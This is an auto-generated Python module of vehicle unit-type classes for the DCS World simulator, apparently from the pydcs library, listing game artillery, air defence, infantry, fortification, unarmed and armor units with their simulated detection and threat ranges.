# This file is generated from pydcs_export.lua import dcs.unittype as unittype class Artillery: class _2B11_mortar(unittype.VehicleType): id = "2B11 mortar" name = "Mortar 2B11 120mm" detection_range = 0 threat_range = 7000 air_weapon_dist = 7000 class SAU_Gvozdika(unittype.VehicleType): id = "SAU Gvozdika" name = "SPH 2S1 Gvozdika 122mm" detection_range = 0 threat_range = 15000 air_weapon_dist = 15000 class SAU_Msta(unittype.VehicleType): id = "SAU Msta" name = "SPH 2S19 Msta 152mm" detection_range = 0 threat_range = 23500 air_weapon_dist = 23500 class SAU_Akatsia(unittype.VehicleType): id = "SAU Akatsia" name = "SPH 2S3 Akatsia 152mm" detection_range = 0 threat_range = 17000 air_weapon_dist = 17000 class SAU_2_C9(unittype.VehicleType): id = "SAU 2-C9" name = "SPM 2S9 Nona 120mm M" detection_range = 0 threat_range = 7000 air_weapon_dist = 7000 class M_109(unittype.VehicleType): id = "M-109" name = "SPH M109 Paladin 155mm" detection_range = 0 threat_range = 22000 air_weapon_dist = 22000 eplrs = True class SpGH_Dana(unittype.VehicleType): id = "SpGH_Dana" name = "SPH Dana vz77 152mm" detection_range = 0 threat_range = 18700 air_weapon_dist = 18700 class Grad_FDDM(unittype.VehicleType): id = "Grad_FDDM" name = "Grad MRL FDDM (FC)" detection_range = 0 threat_range = 1000 air_weapon_dist = 1000 class MLRS_FDDM(unittype.VehicleType): id = "MLRS FDDM" name = "MRLS FDDM (FC)" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 eplrs = True class Grad_URAL(unittype.VehicleType): id = "Grad-URAL" name = "MLRS BM-21 Grad 122mm" detection_range = 0 threat_range = 19000 air_weapon_dist = 19000 class Uragan_BM_27(unittype.VehicleType): id = "Uragan_BM-27" name = "MLRS 9K57 Uragan BM-27 220mm" detection_range = 0 threat_range = 35800 air_weapon_dist = 35800 class Smerch(unittype.VehicleType): id = "Smerch" name = "MLRS 9A52 Smerch CM 300mm" detection_range = 0 threat_range = 70000 air_weapon_dist = 70000 class Smerch_HE(unittype.VehicleType): id = "Smerch_HE" name = 
"MLRS 9A52 Smerch HE 300mm" detection_range = 0 threat_range = 70000 air_weapon_dist = 70000 class MLRS(unittype.VehicleType): id = "MLRS" name = "MLRS M270 227mm" detection_range = 0 threat_range = 32000 air_weapon_dist = 32000 eplrs = True class T155_Firtina(unittype.VehicleType): id = "T155_Firtina" name = "SPH T155 Firtina 155mm" detection_range = 0 threat_range = 41000 air_weapon_dist = 41000 class PLZ05(unittype.VehicleType): id = "PLZ05" name = "PLZ-05" detection_range = 0 threat_range = 23500 air_weapon_dist = 23500 eplrs = True class M12_GMC(unittype.VehicleType): id = "M12_GMC" name = "SPG M12 GMC 155mm" detection_range = 0 threat_range = 18300 air_weapon_dist = 0 class Infantry: class Paratrooper_RPG_16(unittype.VehicleType): id = "Paratrooper RPG-16" name = "Paratrooper RPG-16" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Paratrooper_AKS_74(unittype.VehicleType): id = "Paratrooper AKS-74" name = "Paratrooper AKS" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Infantry_AK_Ins(unittype.VehicleType): id = "Infantry AK Ins" name = "Insurgent AK-74" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_AK(unittype.VehicleType): id = "Soldier AK" name = "Infantry AK-74" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Infantry_AK(unittype.VehicleType): id = "Infantry AK" name = "Infantry AK-74 Rus" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_M249(unittype.VehicleType): id = "Soldier M249" name = "Infantry M249" detection_range = 0 threat_range = 700 air_weapon_dist = 700 class Soldier_M4(unittype.VehicleType): id = "Soldier M4" name = "Infantry M4" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_M4_GRG(unittype.VehicleType): id = "Soldier M4 GRG" name = "Infantry M4 Georgia" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_RPG(unittype.VehicleType): id = "Soldier RPG" name = "Infantry RPG" 
detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_mauser98(unittype.VehicleType): id = "soldier_mauser98" name = "Infantry Mauser 98" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_wwii_br_01(unittype.VehicleType): id = "soldier_wwii_br_01" name = "Infantry SMLE No.4 Mk-1" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_wwii_us(unittype.VehicleType): id = "soldier_wwii_us" name = "Infantry M1 Garand" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class AirDefence: class _2S6_Tunguska(unittype.VehicleType): id = "2S6 Tunguska" name = "SAM SA-19 Tunguska \"Grison\" " detection_range = 18000 threat_range = 8000 air_weapon_dist = 8000 class Kub_2P25_ln(unittype.VehicleType): id = "Kub 2P25 ln" name = "SAM SA-6 Kub \"Gainful\" TEL" detection_range = 0 threat_range = 25000 air_weapon_dist = 25000 class _5p73_s_125_ln(unittype.VehicleType): id = "5p73 s-125 ln" name = "SAM SA-3 S-125 \"Goa\" LN" detection_range = 0 threat_range = 18000 air_weapon_dist = 18000 class S_300PS_5P85C_ln(unittype.VehicleType): id = "S-300PS 5P85C ln" name = "SAM SA-10 S-300 \"Grumble\" TEL D" detection_range = 0 threat_range = 120000 air_weapon_dist = 120000 class S_300PS_5P85D_ln(unittype.VehicleType): id = "S-300PS 5P85D ln" name = "SAM SA-10 S-300 \"Grumble\" TEL C" detection_range = 0 threat_range = 120000 air_weapon_dist = 120000 class SA_11_Buk_LN_9A310M1(unittype.VehicleType): id = "SA-11 Buk LN 9A310M1" name = "SAM SA-11 Buk \"Gadfly\" Fire Dome TEL" detection_range = 50000 threat_range = 35000 air_weapon_dist = 35000 class Osa_9A33_ln(unittype.VehicleType): id = "Osa 9A33 ln" name = "SAM SA-8 Osa \"Gecko\" TEL" detection_range = 30000 threat_range = 10300 air_weapon_dist = 10300 class Tor_9A331(unittype.VehicleType): id = "Tor 9A331" name = "SAM SA-15 Tor \"Gauntlet\"" detection_range = 25000 threat_range = 12000 air_weapon_dist = 12000 class Strela_10M3(unittype.VehicleType): id = 
"Strela-10M3" name = "SAM SA-13 Strela 10M3 \"Gopher\" TEL" detection_range = 8000 threat_range = 5000 air_weapon_dist = 5000 class Strela_1_9P31(unittype.VehicleType): id = "Strela-1 9P31" name = "SAM SA-9 Strela 1 \"Gaskin\" TEL" detection_range = 5000 threat_range = 4200 air_weapon_dist = 4200 class SA_11_Buk_CC_9S470M1(unittype.VehicleType): id = "SA-11 Buk CC 9S470M1" name = "SAM SA-11 Buk \"Gadfly\" C2 " detection_range = 0 threat_range = 0 air_weapon_dist = 0 class SA_8_Osa_LD_9T217(unittype.VehicleType): id = "SA-8 Osa LD 9T217" name = "SAM SA-8 Osa LD 9T217" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Patriot_AMG(unittype.VehicleType): id = "Patriot AMG" name = "SAM Patriot CR (AMG AN/MRC-137)" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Patriot_ECS(unittype.VehicleType): id = "Patriot ECS" name = "SAM Patriot ECS" detection_range = 0 threat_range = 0 air_weapon_dist = 0 eplrs = True class Gepard(unittype.VehicleType): id = "Gepard" name = "SPAAA Gepard" detection_range = 15000 threat_range = 4000 air_weapon_dist = 4000 class Hawk_pcp(unittype.VehicleType): id = "Hawk pcp" name = "SAM Hawk Platoon Command Post (PCP)" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Vulcan(unittype.VehicleType): id = "Vulcan" name = "SPAAA Vulcan M163" detection_range = 5000 threat_range = 2000 air_weapon_dist = 2000 eplrs = True class Hawk_ln(unittype.VehicleType): id = "Hawk ln" name = "SAM Hawk LN M192" detection_range = 0 threat_range = 45000 air_weapon_dist = 45000 class M48_Chaparral(unittype.VehicleType): id = "M48 Chaparral" name = "SAM Chaparral M48" detection_range = 10000 threat_range = 8500 air_weapon_dist = 8500 eplrs = True class M6_Linebacker(unittype.VehicleType): id = "M6 Linebacker" name = "SAM Linebacker - Bradley M6" detection_range = 8000 threat_range = 4500 air_weapon_dist = 4500 eplrs = True class Patriot_ln(unittype.VehicleType): id = "Patriot ln" name = "SAM Patriot LN" detection_range = 0 
threat_range = 100000 air_weapon_dist = 100000 class M1097_Avenger(unittype.VehicleType): id = "M1097 Avenger" name = "SAM Avenger (Stinger)" detection_range = 5200 threat_range = 4500 air_weapon_dist = 4500 eplrs = True class Patriot_EPP(unittype.VehicleType): id = "Patriot EPP" name = "SAM Patriot EPP-III" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Patriot_cp(unittype.VehicleType): id = "Patriot cp" name = "SAM Patriot C2 ICC" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Roland_ADS(unittype.VehicleType): id = "Roland ADS" name = "SAM Roland ADS" detection_range = 12000 threat_range = 8000 air_weapon_dist = 8000 class S_300PS_54K6_cp(unittype.VehicleType): id = "S-300PS 54K6 cp" name = "SAM SA-10 S-300 \"Grumble\" C2 " detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Soldier_stinger(unittype.VehicleType): id = "Soldier stinger" name = "MANPADS Stinger" detection_range = 5000 threat_range = 4500 air_weapon_dist = 4500 class Stinger_comm_dsr(unittype.VehicleType): id = "Stinger comm dsr" name = "MANPADS Stinger C2 Desert" detection_range = 5000 threat_range = 0 air_weapon_dist = 0 class Stinger_comm(unittype.VehicleType): id = "Stinger comm" name = "MANPADS Stinger C2" detection_range = 5000 threat_range = 0 air_weapon_dist = 0 class ZSU_23_4_Shilka(unittype.VehicleType): id = "ZSU-23-4 Shilka" name = "SPAAA ZSU-23-4 Shilka \"Gun Dish\"" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class ZU_23_Emplacement_Closed(unittype.VehicleType): id = "ZU-23 Emplacement Closed" name = "AAA ZU-23 Closed Emplacement" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class ZU_23_Emplacement(unittype.VehicleType): id = "ZU-23 Emplacement" name = "AAA ZU-23 Emplacement" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class Ural_375_ZU_23(unittype.VehicleType): id = "Ural-375 ZU-23" name = "SPAAA ZU-23-2 Mounted Ural 375" detection_range = 5000 threat_range = 2500 
air_weapon_dist = 2500 class ZU_23_Closed_Insurgent(unittype.VehicleType): id = "ZU-23 Closed Insurgent" name = "AAA ZU-23 Insurgent Closed Emplacement" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class Ural_375_ZU_23_Insurgent(unittype.VehicleType): id = "Ural-375 ZU-23 Insurgent" name = "SPAAA ZU-23-2 Insurgent Mounted Ural-375" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class ZU_23_Insurgent(unittype.VehicleType): id = "ZU-23 Insurgent" name = "AAA ZU-23 Insurgent Emplacement" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class SA_18_Igla_manpad(unittype.VehicleType): id = "SA-18 Igla manpad" name = "MANPADS SA-18 Igla \"Grouse\"" detection_range = 5000 threat_range = 5200 air_weapon_dist = 5200 class SA_18_Igla_comm(unittype.VehicleType): id = "SA-18 Igla comm" name = "MANPADS SA-18 Igla \"Grouse\" C2" detection_range = 5000 threat_range = 0 air_weapon_dist = 0 class SA_18_Igla_S_manpad(unittype.VehicleType): id = "SA-18 Igla-S manpad" name = "MANPADS SA-18 Igla-S \"Grouse\"" detection_range = 5000 threat_range = 5200 air_weapon_dist = 5200 class SA_18_Igla_S_comm(unittype.VehicleType): id = "SA-18 Igla-S comm" name = "MANPADS SA-18 Igla-S \"Grouse\" C2" detection_range = 5000 threat_range = 0 air_weapon_dist = 0 class Igla_manpad_INS(unittype.VehicleType): id = "Igla manpad INS" name = "MANPADS SA-18 Igla \"Grouse\" Ins" detection_range = 5000 threat_range = 5200 air_weapon_dist = 5200 class _1L13_EWR(unittype.VehicleType): id = "1L13 EWR" name = "EWR 1L13" detection_range = 120000 threat_range = 0 air_weapon_dist = 0 class Kub_1S91_str(unittype.VehicleType): id = "Kub 1S91 str" name = "SAM SA-6 Kub \"Straight Flush\" STR" detection_range = 70000 threat_range = 0 air_weapon_dist = 0 class S_300PS_40B6M_tr(unittype.VehicleType): id = "S-300PS 40B6M tr" name = "SAM SA-10 S-300 \"Grumble\" Flap Lid TR " detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class 
S_300PS_40B6MD_sr(unittype.VehicleType): id = "S-300PS 40B6MD sr" name = "SAM SA-10 S-300 \"Grumble\" Clam Shell SR" detection_range = 60000 threat_range = 0 air_weapon_dist = 0 class _55G6_EWR(unittype.VehicleType): id = "55G6 EWR" name = "EWR 55G6" detection_range = 120000 threat_range = 0 air_weapon_dist = 0 class S_300PS_64H6E_sr(unittype.VehicleType): id = "S-300PS 64H6E sr" name = "SAM SA-10 S-300 \"Grumble\" Big Bird SR " detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class SA_11_Buk_SR_9S18M1(unittype.VehicleType): id = "SA-11 Buk SR 9S18M1" name = "SAM SA-11 Buk \"Gadfly\" Snow Drift SR" detection_range = 100000 threat_range = 0 air_weapon_dist = 0 class Dog_Ear_radar(unittype.VehicleType): id = "Dog Ear radar" name = "MCC-SR Sborka \"Dog Ear\" SR" detection_range = 35000 threat_range = 0 air_weapon_dist = 0 class Hawk_tr(unittype.VehicleType): id = "Hawk tr" name = "SAM Hawk TR (AN/MPQ-46)" detection_range = 90000 threat_range = 0 air_weapon_dist = 0 class Hawk_sr(unittype.VehicleType): id = "Hawk sr" name = "SAM Hawk SR (AN/MPQ-50)" detection_range = 90000 threat_range = 0 air_weapon_dist = 0 eplrs = True class Patriot_str(unittype.VehicleType): id = "Patriot str" name = "SAM Patriot STR" detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class Hawk_cwar(unittype.VehicleType): id = "Hawk cwar" name = "SAM Hawk CWAR AN/MPQ-55" detection_range = 70000 threat_range = 0 air_weapon_dist = 0 eplrs = True class P_19_s_125_sr(unittype.VehicleType): id = "p-19 s-125 sr" name = "SAM P19 \"Flat Face\" SR (SA-2/3)" detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class Roland_Radar(unittype.VehicleType): id = "Roland Radar" name = "SAM Roland EWR" detection_range = 35000 threat_range = 0 air_weapon_dist = 0 class Snr_s_125_tr(unittype.VehicleType): id = "snr s-125 tr" name = "SAM SA-3 S-125 \"Low Blow\" TR" detection_range = 100000 threat_range = 0 air_weapon_dist = 0 class S_75M_Volhov(unittype.VehicleType): id = 
"S_75M_Volhov" name = "SAM SA-2 S-75 \"Guideline\" LN" detection_range = 0 threat_range = 43000 air_weapon_dist = 43000 class SNR_75V(unittype.VehicleType): id = "SNR_75V" name = "SAM SA-2 S-75 \"Fan Song\" TR" detection_range = 100000 threat_range = 0 air_weapon_dist = 0 class RLS_19J6(unittype.VehicleType): id = "RLS_19J6" name = "SR 19J6" detection_range = 150000 threat_range = 0 air_weapon_dist = 0 class ZSU_57_2(unittype.VehicleType): id = "ZSU_57_2" name = "SPAAA ZSU-57-2" detection_range = 5000 threat_range = 7000 air_weapon_dist = 7000 class S_60_Type59_Artillery(unittype.VehicleType): id = "S-60_Type59_Artillery" name = "AAA S-60 57mm" detection_range = 5000 threat_range = 7000 air_weapon_dist = 7000 class Generator_5i57(unittype.VehicleType): id = "generator_5i57" name = "Disel Power Station 5I57A" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Bofors40(unittype.VehicleType): id = "bofors40" name = "AAA Bofors 40mm" detection_range = 0 threat_range = 4000 air_weapon_dist = 4000 class Rapier_fsa_launcher(unittype.VehicleType): id = "rapier_fsa_launcher" name = "SAM Rapier LN" detection_range = 30000 threat_range = 6800 air_weapon_dist = 6800 class Rapier_fsa_optical_tracker_unit(unittype.VehicleType): id = "rapier_fsa_optical_tracker_unit" name = "SAM Rapier Tracker" detection_range = 20000 threat_range = 0 air_weapon_dist = 0 class Rapier_fsa_blindfire_radar(unittype.VehicleType): id = "rapier_fsa_blindfire_radar" name = "SAM Rapier Blindfire TR" detection_range = 30000 threat_range = 0 air_weapon_dist = 0 class Flak18(unittype.VehicleType): id = "flak18" name = "AAA 8,8cm Flak 18" detection_range = 0 threat_range = 11000 air_weapon_dist = 11000 class HQ_7_LN_SP(unittype.VehicleType): id = "HQ-7_LN_SP" name = "HQ-7 Self-Propelled LN" detection_range = 20000 threat_range = 12000 air_weapon_dist = 12000 class HQ_7_STR_SP(unittype.VehicleType): id = "HQ-7_STR_SP" name = "HQ-7 Self-Propelled STR" detection_range = 30000 threat_range = 0 
air_weapon_dist = 0 class Flak30(unittype.VehicleType): id = "flak30" name = "AAA Flak 38 20mm" detection_range = 0 threat_range = 2500 air_weapon_dist = 2500 class Flak36(unittype.VehicleType): id = "flak36" name = "AAA 8,8cm Flak 36" detection_range = 0 threat_range = 11000 air_weapon_dist = 11000 class Flak37(unittype.VehicleType): id = "flak37" name = "AAA 8,8cm Flak 37" detection_range = 0 threat_range = 11000 air_weapon_dist = 11000 class Flak38(unittype.VehicleType): id = "flak38" name = "AAA Flak-Vierling 38 Quad 20mm" detection_range = 0 threat_range = 2500 air_weapon_dist = 2500 class KDO_Mod40(unittype.VehicleType): id = "KDO_Mod40" name = "AAA SP Kdo.G.40" detection_range = 30000 threat_range = 0 air_weapon_dist = 0 class Flakscheinwerfer_37(unittype.VehicleType): id = "Flakscheinwerfer_37" name = "SL Flakscheinwerfer 37" detection_range = 15000 threat_range = 15000 air_weapon_dist = 0 class Maschinensatz_33(unittype.VehicleType): id = "Maschinensatz_33" name = "PU Maschinensatz_33" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Flak41(unittype.VehicleType): id = "flak41" name = "AAA 8,8cm Flak 41" detection_range = 0 threat_range = 12500 air_weapon_dist = 12500 class FuMG_401(unittype.VehicleType): id = "FuMG-401" name = "EWR FuMG-401 Freya LZ" detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class FuSe_65(unittype.VehicleType): id = "FuSe-65" name = "EWR FuSe-65 Würzburg-Riese" detection_range = 60000 threat_range = 0 air_weapon_dist = 0 class QF_37_AA(unittype.VehicleType): id = "QF_37_AA" name = "AAA QF 3,7\"" detection_range = 0 threat_range = 9000 air_weapon_dist = 9000 class M45_Quadmount(unittype.VehicleType): id = "M45_Quadmount" name = "AAA M45 Quadmount HB 12.7mm" detection_range = 0 threat_range = 1500 air_weapon_dist = 1500 class M1_37mm(unittype.VehicleType): id = "M1_37mm" name = "AAA M1 37mm" detection_range = 0 threat_range = 5700 air_weapon_dist = 5700 class Fortification: class 
Bunker(unittype.VehicleType): id = "Bunker" name = "Bunker 2" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class Sandbox(unittype.VehicleType): id = "Sandbox" name = "Bunker 1" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class House1arm(unittype.VehicleType): id = "house1arm" name = "Barracks armed" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class House2arm(unittype.VehicleType): id = "house2arm" name = "Watch tower armed" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class Outpost_road(unittype.VehicleType): id = "outpost_road" name = "Road outpost" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class Outpost(unittype.VehicleType): id = "outpost" name = "Outpost" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class HouseA_arm(unittype.VehicleType): id = "houseA_arm" name = "Building armed" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class TACAN_beacon(unittype.VehicleType): id = "TACAN_beacon" name = "Beacon TACAN Portable TTS 3030" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class SK_C_28_naval_gun(unittype.VehicleType): id = "SK_C_28_naval_gun" name = "Gun 15cm SK C/28 Naval in Bunker" detection_range = 0 threat_range = 20000 air_weapon_dist = 0 class Fire_control(unittype.VehicleType): id = "fire_control" name = "Bunker with Fire Control Center" detection_range = 0 threat_range = 1100 air_weapon_dist = 1100 class Unarmed: class Ural_4320_APA_5D(unittype.VehicleType): id = "Ural-4320 APA-5D" name = "GPU APA-5D on Ural 4320" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ATMZ_5(unittype.VehicleType): id = "ATMZ-5" name = "Refueler ATMZ-5" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ATZ_10(unittype.VehicleType): id = "ATZ-10" name = "Refueler ATZ-10" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class GAZ_3307(unittype.VehicleType): id = "GAZ-3307" name = "Truck GAZ-3307" detection_range = 0 
threat_range = 0 air_weapon_dist = 0 class GAZ_3308(unittype.VehicleType): id = "GAZ-3308" name = "Truck GAZ-3308" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class GAZ_66(unittype.VehicleType): id = "GAZ-66" name = "Truck GAZ-66" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class M978_HEMTT_Tanker(unittype.VehicleType): id = "M978 HEMTT Tanker" name = "Refueler M978 HEMTT" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class HEMTT_TFFT(unittype.VehicleType): id = "HEMTT TFFT" name = "Firefighter HEMMT TFFT" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class IKARUS_Bus(unittype.VehicleType): id = "IKARUS Bus" name = "Bus IKARUS-280" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class KAMAZ_Truck(unittype.VehicleType): id = "KAMAZ Truck" name = "Truck KAMAZ 43101" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class LAZ_Bus(unittype.VehicleType): id = "LAZ Bus" name = "Bus LAZ-695" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class LiAZ_Bus(unittype.VehicleType): id = "LiAZ Bus" name = "Bus LiAZ-677" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Hummer(unittype.VehicleType): id = "Hummer" name = "LUV HMMWV Jeep" detection_range = 0 threat_range = 0 air_weapon_dist = 0 eplrs = True class M_818(unittype.VehicleType): id = "M 818" name = "Truck M939 Heavy" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class MAZ_6303(unittype.VehicleType): id = "MAZ-6303" name = "Truck MAZ-6303" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Predator_GCS(unittype.VehicleType): id = "Predator GCS" name = "MCC Predator UAV CP & GCS" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Predator_TrojanSpirit(unittype.VehicleType): id = "Predator TrojanSpirit" name = "MCC-COMM Predator UAV CL" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Suidae(unittype.VehicleType): id = "Suidae" name = "Suidae" detection_range = 0 threat_range = 0 
air_weapon_dist = 0 class Tigr_233036(unittype.VehicleType): id = "Tigr_233036" name = "LUV Tigr" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Trolley_bus(unittype.VehicleType): id = "Trolley bus" name = "Bus ZIU-9 Trolley" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class UAZ_469(unittype.VehicleType): id = "UAZ-469" name = "LUV UAZ-469 Jeep" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_ATsP_6(unittype.VehicleType): id = "Ural ATsP-6" name = "Firefighter Ural ATsP-6" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_4320_31(unittype.VehicleType): id = "Ural-4320-31" name = "Truck Ural-4320-31 Arm'd" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_4320T(unittype.VehicleType): id = "Ural-4320T" name = "Truck Ural-4320T" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_375_PBU(unittype.VehicleType): id = "Ural-375 PBU" name = "Truck Ural-375 Mobile C2" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_375(unittype.VehicleType): id = "Ural-375" name = "Truck Ural-375" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class VAZ_Car(unittype.VehicleType): id = "VAZ Car" name = "Car VAZ-2109" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ZiL_131_APA_80(unittype.VehicleType): id = "ZiL-131 APA-80" name = "GPU APA-80 on ZIL-131" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class SKP_11(unittype.VehicleType): id = "SKP-11" name = "Truck SKP-11 Mobile ATC" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ZIL_131_KUNG(unittype.VehicleType): id = "ZIL-131 KUNG" name = "Truck ZIL-131 (C2)" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ZIL_4331(unittype.VehicleType): id = "ZIL-4331" name = "Truck ZIL-4331" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class KrAZ6322(unittype.VehicleType): id = "KrAZ6322" name = "Truck KrAZ-6322 6x6" detection_range = 0 threat_range = 0 
air_weapon_dist = 0 class ATZ_5(unittype.VehicleType): id = "ATZ-5" name = "Refueler ATZ-5" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class AA8(unittype.VehicleType): id = "AA8" name = "Fire Fight Vehicle AA-7.2/60" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ATZ_60_Maz(unittype.VehicleType): id = "ATZ-60_Maz" name = "Refueler ATZ-60 Tractor" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ZIL_135(unittype.VehicleType): id = "ZIL-135" name = "Truck ZIL-135" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class TZ_22_KrAZ(unittype.VehicleType): id = "TZ-22_KrAZ" name = "Refueler TZ-22 Tractor" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Bedford_MWD(unittype.VehicleType): id = "Bedford_MWD" name = "Truck Bedford" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Land_Rover_101_FC(unittype.VehicleType): id = "Land_Rover_101_FC" name = "Truck Land Rover 101 FC" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Land_Rover_109_S3(unittype.VehicleType): id = "Land_Rover_109_S3" name = "LUV Land Rover 109" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Blitz_36_6700A(unittype.VehicleType): id = "Blitz_36-6700A" name = "Truck Opel Blitz" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Kubelwagen_82(unittype.VehicleType): id = "Kubelwagen_82" name = "LUV Kubelwagen 82" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Sd_Kfz_2(unittype.VehicleType): id = "Sd_Kfz_2" name = "LUV Kettenrad" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Sd_Kfz_7(unittype.VehicleType): id = "Sd_Kfz_7" name = "Carrier Sd.Kfz.7 Tractor" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Horch_901_typ_40_kfz_21(unittype.VehicleType): id = "Horch_901_typ_40_kfz_21" name = "LUV Horch 901 Staff Car" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class CCKW_353(unittype.VehicleType): id = "CCKW_353" name = "Truck GMC 
\"Jimmy\" 6x6 Truck" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Willys_MB(unittype.VehicleType): id = "Willys_MB" name = "Car Willys Jeep" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class M30_CC(unittype.VehicleType): id = "M30_CC" name = "Carrier M30 Cargo" detection_range = 0 threat_range = 1200 air_weapon_dist = 0 class M4_Tractor(unittype.VehicleType): id = "M4_Tractor" name = "Tractor M4 Hi-Speed" detection_range = 0 threat_range = 1200 air_weapon_dist = 0 class Armor: class AAV7(unittype.VehicleType): id = "AAV7" name = "APC AAV-7 Amphibious" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 class BMD_1(unittype.VehicleType): id = "BMD-1" name = "IFV BMD-1" detection_range = 0 threat_range = 3000 air_weapon_dist = 1000 class BMP_1(unittype.VehicleType): id = "BMP-1" name = "IFV BMP-1" detection_range = 0 threat_range = 3000 air_weapon_dist = 1000 class BMP_2(unittype.VehicleType): id = "BMP-2" name = "IFV BMP-2" detection_range = 0 threat_range = 3000 air_weapon_dist = 2000 class BMP_3(unittype.VehicleType): id = "BMP-3" name = "IFV BMP-3" detection_range = 0 threat_range = 4000 air_weapon_dist = 2000 class BRDM_2(unittype.VehicleType): id = "BRDM-2" name = "Scout BRDM-2" detection_range = 0 threat_range = 1600 air_weapon_dist = 1600 class BTR_80(unittype.VehicleType): id = "BTR-80" name = "APC BTR-80" detection_range = 0 threat_range = 1600 air_weapon_dist = 1600 class BTR_D(unittype.VehicleType): id = "BTR_D" name = "APC BTR-RD" detection_range = 0 threat_range = 3000 air_weapon_dist = 1000 class Cobra(unittype.VehicleType): id = "Cobra" name = "Scout Cobra" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 class LAV_25(unittype.VehicleType): id = "LAV-25" name = "IFV LAV-25" detection_range = 0 threat_range = 2500 air_weapon_dist = 2500 class M1043_HMMWV_Armament(unittype.VehicleType): id = "M1043 HMMWV Armament" name = "Scout HMMWV" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 
